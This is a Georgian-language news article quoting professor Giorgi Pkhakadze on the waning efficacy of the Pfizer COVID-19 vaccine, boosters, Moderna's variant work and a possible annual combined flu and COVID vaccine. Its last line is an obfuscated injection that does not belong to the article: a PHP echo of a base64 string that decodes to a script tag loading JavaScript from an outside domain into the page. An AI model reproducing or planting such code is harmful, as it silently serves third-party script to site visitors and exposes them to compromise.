celsiusi
ავერსი საქკაბელი
პროფესორი, ორგანიზაციის – „აკრედიტაცია საზღვრების გარეშე“ – ხელმძვანელის, გიორგი ფხაკაძის განცხადებით, ე.წ ტრადიციული ვაქცინებისგან განსხვავებით, სადაც ასე ვთქვათ მკვდარი, ან ნახევრად მკვდარი ნაწილაკები არის ვირუსის, "ფაიზერი" აწვდის მხოლოდ და მხოლოდ ინფორმაციას ორგანიზმს და მისი ეფექტურობა არის 5-6 თვე. 
 
როგორც ფხაკაძემ საინფორმაციო სააგენტო BUSINESS TIME-ს განუცხადა, ორივე კომპანია - “მოდერნა” და “ფაიზერი” მუშაობენ აქტიურად, რომ გააუმჯობესონ მათი ტექნოლოგიები. 
 
მისივე თქმით, “მოდერნა” მუშაობს უკვე იმისთვის, რომ ახლო მომავალში გვქონდეს საშუალება სხვადასხვა შტამებს უფრო ეფექტურად ვებრძოლოთ.
 
“ბუსტერი არის ფაიზერის მესამე დოზის ვაქცინა, ჩვენ ეს უკვე ვიცით, მე ჯერ კიდევ წელიწადნახევრის წინ ვამბობდი, რომ "ფაიზერის" ეფექტიანობა არის 5 თვე, იმიტომ, რომ ე.წ ტრადიციული ვაქცინებისგან განსხვავებით, სადაც ასე ვთქვათ მკვდარი, ან ნახევრად მკვდარი და ასე შემდეგ ნაწილაკები არის ვირუსის, ფაიზერი აწვდის მხოლოდ და მხოლოდ ინფორმაციას ორგანიზმს - ეს არის ვერაგი ვირუსი და მიხედე! ამიტომ არის მისი ეფექტურობა 5-6 თვიანი. 
ასევე, განსხვავებულია მისი ეფექტურობა ასაკიდან გამომდინარე. მაგალითად, 12 წლის ასაკში, თუ მისი ეფექტურობა არის 94% მდე, 80 წელს გადაცილებულ ადამიანებში ეფექტიანობა არის 64%-მდე. ამას ემატება ისიც, რომ ეს ვაქცინა ეფექტურობასა და სიძლიერეს დროთა განმავლობაში კარგავს, ამიტომ ორივე კომპანია "მოდერნა" და ფაიზერი მუშაობენ აქტიურად, რომ გააუმჯობესონ მათი ტექნოლოგიები. "მოდერნა" მუშაობს უკვე , იმისთვის , რომ ახლო მომავალში გვქონდეს საშუალება სხვადასხვა შტამებს უფრო ეფექტურად ვებრძოლოთ. რაც შეეხება იმას, რომ  ყოველ 6 თვეში გვექნება თუ არა გასაკეთებელი ეს ვაქცინა , ვფიქრობ რომ საბოლოო ჯამში ეს იქნება სეზონური გრიპის ვაქცინის მაგვარი, როგორც ჩვენ ყოველწლიურად ვიკეთებდით მაგალითად 4 კომპონენტიან გრიპის ვაქცინას, ასე სექტემბერ-ოქტომბერში ყოველწლიურად გვექნება 5 კომპონენტიანი გრიპის ვაქცინა, სადაც იქნება კოვიდიც, სეზონური გრიპიც და ა.შ. მე იმედი მაქვს, რომ ამ მიმართულებით წავალთ. ვინაიდან სანამ ბოლო ადამიანი არ იქნება განკურნებული კორონასგან ეს ვირუსი იტრიალებს.”- განაცხადა ფხაკაძემ.
 
გიორგი ფხაკაძის თქმით, კორონავირუსი არსად წასვლას არ აპირებს და ის გვეთამაშება და ცდილობს გაძლიერდეს. 
 
“სამწუხაროდ, ძალიან ცუდი ამბავი გვაქვს, კორონა არ აპირებს არსად წასვლას, მე იმედი მქონდა, რომ წავიდოდა, მაგრამ უკვე ფაქტები გვაქვს, რომ ადამიანიდან გადავიდა ცხოველებზე და ცხოველებიდან ადამიანებზე, ეს ვირუსი გვეთამაშება პინგ-პონგივით, ის ნახულობს ყველანაირ ხერხს, რომ გვებრძოლოს და ჩვენც უნდა ვიყოთ უფრო ჭკვიანები და გამოვიყენოთ ყველანაირი საშუალება. სამასამდე კომპანია მუშაობს ვაქცინებზე, ასევე მუშაობენ მედიკამენტებზე და წლის ბოლოსთვის ჩვენ ალბათ უკვე გვექნება მედიკამენტები, რომლებიც მე დიდი იმედი მაქვს, დაგვეხმარებიან ვირუსთან ეფექტურად ბრძოლაში.”- განაცხადა ფხაკაძემ. 
 
 
 
14203
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");